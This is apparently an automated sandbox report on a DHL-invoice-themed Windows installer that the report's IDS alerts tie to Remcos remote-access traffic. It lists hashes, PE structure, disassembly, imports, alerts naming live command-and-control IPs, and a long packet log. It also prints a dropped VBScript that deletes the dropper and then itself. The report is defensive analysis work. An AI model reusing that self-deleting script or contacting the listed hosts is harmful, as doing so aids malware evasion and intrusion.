                                                                                                                                                                                                                                    Preview:O.n. .E.r.r.o.r. .R.e.s.u.m.e. .N.e.x.t...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...w.h.i.l.e. .f.s.o...F.i.l.e.E.x.i.s.t.s.(.".C.:.\.U.s.e.r.s.\.D.y.l.a.n.e.\.D.e.s.k.t.o.p.\.D.H.L._.A.w.b._.S.h.i.p.p.i.n.g._.I.n.v.o.i.c.e._.d.o.c._.0.1.0.7.2.0.2.5.7.8.2.0.0.2.0.0.3.1.8.0.8.1.7.4.C.N.1.8.0.0.3.0.1.0.7.2.0.2.5...b.a.t...e.x.e.".)...f.s.o...D.e.l.e.t.e.F.i.l.e. .".C.:.\.U.s.e.r.s.\.D.y.l.a.n.e.\.D.e.s.k.t.o.p.\.D.H.L._.A.w.b._.S.h.i.p.p.i.n.g._.I.n.v.o.i.c.e._.d.o.c._.0.1.0.7.2.0.2.5.7.8.2.0.0.2.0.0.3.1.8.0.8.1.7.4.C.N.1.8.0.0.3.0.1.0.7.2.0.2.5...b.a.t...e.x.e."...w.e.n.d...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):12288
                                                                                                                                                                                                                                    Entropy (8bit):5.719859767584478
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:192:1enY0LWelt70elWjvfstJcVtwtYbjnIOg5AaDnbC7ypXhtIj:18PJlt70esj0Mt9vn6ay6
                                                                                                                                                                                                                                    MD5:0D7AD4F45DC6F5AA87F606D0331C6901
                                                                                                                                                                                                                                    SHA1:48DF0911F0484CBE2A8CDD5362140B63C41EE457
                                                                                                                                                                                                                                    SHA-256:3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
                                                                                                                                                                                                                                    SHA-512:C07DE7308CB54205E8BD703001A7FE4FD7796C9AC1B4BB330C77C872BF712B093645F40B80CE7127531FE6746A5B66E18EA073AB6A644934ABED9BB64126FEA9
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                    • Filename: KO0q4biYfC.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Yoranis Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Pralevia Setup 1.0.0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: Awb 4586109146.bat.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: PO 0309494059506060609696007.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    • Filename: YF3YnL4ksc.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....~.\...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:..
                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                    Entropy (8bit):7.665655342643962
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                                                    File size:764'339 bytes
                                                                                                                                                                                                                                    MD5:a25712989100fcdcb627446bcedb6c0a
                                                                                                                                                                                                                                    SHA1:7577219dfedaaedff8b10dc274b97cff0f2788fb
                                                                                                                                                                                                                                    SHA256:148b1248f6b89fa446d40890492bf0f9dddfa0b17d1cb9cad9fd84a0f9934890
                                                                                                                                                                                                                                    SHA512:cb73d6e402c985060fa29f19cd8a9c5969fea907be08dace163d30994849eec6da053822959e9b0d2f9e2aac5435381fbef47a6e04cd16e4df038059ba266d04
                                                                                                                                                                                                                                    SSDEEP:12288:gSsoaNkT5nJ2CDKyunOwmxfydcitSooK0uTddwDAvJaDpuhFQp3nZoThK:gxCnJ7DKZnO5xPK02dYDpmQp3nZac
                                                                                                                                                                                                                                    TLSH:C6F4F1AAF150A991C08D73B2843F3EDE5668ECCEBD7CD96C198D3A45FBB72C01806855
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................h.........
                                                                                                                                                                                                                                    Icon Hash:9b673392d8969765
                                                                                                                                                                                                                                    Entrypoint:0x40338f
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x5C157F2E [Sat Dec 15 22:24:46 2018 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:4
                                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                                    File Version Major:4
                                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                                    Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    push edi
                                                                                                                                                                                                                                    push 00000020h
                                                                                                                                                                                                                                    pop edi
                                                                                                                                                                                                                                    xor ebx, ebx
                                                                                                                                                                                                                                    push 00008001h
                                                                                                                                                                                                                                    mov dword ptr [esp+14h], ebx
                                                                                                                                                                                                                                    mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                                    call dword ptr [004080A8h]
                                                                                                                                                                                                                                    call dword ptr [004080A4h]
                                                                                                                                                                                                                                    and eax, BFFFFFFFh
                                                                                                                                                                                                                                    cmp ax, 00000006h
                                                                                                                                                                                                                                    mov dword ptr [00434EECh], eax
                                                                                                                                                                                                                                    je 00007FD27CC9EB73h
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    call 00007FD27CCA1E25h
                                                                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                                                                    je 00007FD27CC9EB69h
                                                                                                                                                                                                                                    push 00000C00h
                                                                                                                                                                                                                                    call eax
                                                                                                                                                                                                                                    mov esi, 004082B0h
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    call 00007FD27CCA1D9Fh
                                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                                    call dword ptr [00408150h]
                                                                                                                                                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                                                                                    cmp byte ptr [esi], 00000000h
                                                                                                                                                                                                                                    jne 00007FD27CC9EB4Ch
                                                                                                                                                                                                                                    push 0000000Ah
                                                                                                                                                                                                                                    call 00007FD27CCA1DF8h
                                                                                                                                                                                                                                    push 00000008h
                                                                                                                                                                                                                                    call 00007FD27CCA1DF1h
                                                                                                                                                                                                                                    push 00000006h
                                                                                                                                                                                                                                    mov dword ptr [00434EE4h], eax
                                                                                                                                                                                                                                    call 00007FD27CCA1DE5h
                                                                                                                                                                                                                                    cmp eax, ebx
                                                                                                                                                                                                                                    je 00007FD27CC9EB71h
                                                                                                                                                                                                                                    push 0000001Eh
                                                                                                                                                                                                                                    call eax
                                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                                    je 00007FD27CC9EB69h
                                                                                                                                                                                                                                    or byte ptr [00434EEFh], 00000040h
                                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                                    call dword ptr [00408044h]
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    call dword ptr [004082A0h]
                                                                                                                                                                                                                                    mov dword ptr [00434FB8h], eax
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                                                                                                                    push 000002B4h
                                                                                                                                                                                                                                    push eax
                                                                                                                                                                                                                                    push ebx
                                                                                                                                                                                                                                    push 0042B208h
                                                                                                                                                                                                                                    call dword ptr [00408188h]
                                                                                                                                                                                                                                    push 0040A2C8h
                                                                                                                                                                                                                                    Programming Language:
                                                                                                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x530000x2a7c8.rsrc
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                    .text0x10000x66270x680037029c3103747b9cc70c8ecd944a9b83False0.6643629807692307data6.451784672975888IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .rdata0x80000x14a20x1600eecac1fed9cc6b447d50940d178404d8False0.4405184659090909data5.025178929113415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    .data0xa0000x2aff80x600939516377e7577b622eb1ffdc4b5db4aFalse0.517578125data4.03532418489749IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .ndata0x350000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                    .rsrc0x530000x2a7c80x2a800e4f28a45b728cc6119beb84ff29a2c0aFalse0.2807502297794118data5.286546909879635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                    RT_ICON0x533e80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.23547852833313618
                                                                                                                                                                                                                                    RT_ICON0x63c100x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.2597487912549926
                                                                                                                                                                                                                                    RT_ICON0x6d0b80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.29551756007393715
                                                                                                                                                                                                                                    RT_ICON0x725400x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.31317902692489374
                                                                                                                                                                                                                                    RT_ICON0x767680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.3537344398340249
                                                                                                                                                                                                                                    RT_ICON0x78d100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4406660412757974
                                                                                                                                                                                                                                    RT_ICON0x79db80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.451226012793177
                                                                                                                                                                                                                                    RT_ICON0x7ac600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4864754098360656
                                                                                                                                                                                                                                    RT_ICON0x7b5e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.506768953068592
                                                                                                                                                                                                                                    RT_ICON0x7be900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5034562211981567
                                                                                                                                                                                                                                    RT_ICON0x7c5580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3880057803468208
                                                                                                                                                                                                                                    RT_ICON0x7cac00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5957446808510638
                                                                                                                                                                                                                                    RT_DIALOG0x7cf280x100dataEnglishUnited States0.5234375
                                                                                                                                                                                                                                    RT_DIALOG0x7d0280x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                                                                                                                    RT_DIALOG0x7d1480x60dataEnglishUnited States0.7291666666666666
                                                                                                                                                                                                                                    RT_GROUP_ICON0x7d1a80xaedataEnglishUnited States0.6609195402298851
                                                                                                                                                                                                                                    RT_VERSION0x7d2580x22cdataEnglishUnited States0.5323741007194245
                                                                                                                                                                                                                                    RT_MANIFEST0x7d4880x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                                                    KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                                                                                                                    USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                                                                                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                                                                                                                    SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                                                                                                                    ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                                                                                                                    COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                                                                                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                    EnglishUnited States
                                                                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                    2025-01-09T08:37:41.675647+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304983123.45.46.174443TCP
                                                                                                                                                                                                                                    2025-01-09T08:38:10.057116+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.11.3049832109.99.162.14443TCP
                                                                                                                                                                                                                                    2025-01-09T08:38:18.943128+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.11.304983343.226.229.2053981TCP
                                                                                                                                                                                                                                    2025-01-09T08:38:21.750847+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.11.3049836178.237.33.5080TCP
                                                                                                                                                                                                                                    2025-01-09T08:38:22.348584+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.11.304983543.226.229.2053981TCP
                                                                                                                                                                                                                                    2025-01-09T08:38:31.830812+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.11.304983743.226.229.2053981TCP
                                                                                                                                                                                                                                    2025-01-09T08:38:32.408801+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.11.304983843.226.229.2053981TCP
                                                                                                                                                                                                                                    2025-01-09T08:38:45.179468+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304983923.45.46.174443TCP
                                                                                                                                                                                                                                    2025-01-09T08:41:54.682777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304984023.45.46.174443TCP
                                                                                                                                                                                                                                    2025-01-09T08:44:01.220472+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304984123.45.46.174443TCP
                                                                                                                                                                                                                                    2025-01-09T08:46:07.736619+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.304984223.45.46.174443TCP
                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:08.946587086 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:08.946608067 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:08.946803093 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:08.956315041 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:08.956370115 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:09.743027925 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:09.743223906 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:09.743241072 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:09.781423092 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:09.781435013 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:09.781661034 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:09.781853914 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:09.783993959 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:09.826210022 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.057076931 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.057089090 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.057220936 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.057231903 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.057240009 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.057317019 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.057451963 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.315767050 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.315771103 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.316056967 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.316137075 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.316415071 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.316646099 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.316770077 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.317143917 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.317440033 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.579932928 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.579937935 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.580111027 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.580352068 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.580559015 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.580734015 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.581363916 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.581556082 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.581680059 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.582082987 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.582237959 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.582432032 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.582793951 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.583168030 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.583563089 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.583964109 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.584239006 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.585059881 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.585059881 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.839250088 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.839253902 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.839519978 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.839940071 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.840089083 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.840320110 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.840735912 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.840898037 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.840898037 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.841070890 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.841530085 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.841689110 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.841689110 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.841882944 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.842152119 CET44349832109.99.162.14192.168.11.30
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.842310905 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.842310905 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.842410088 CET49832443192.168.11.30109.99.162.14
                                                                                                                                                                                                                                    Jan 9, 2025 08:38:10.842981100 CET44349832109.99.162.14192.168.11.30
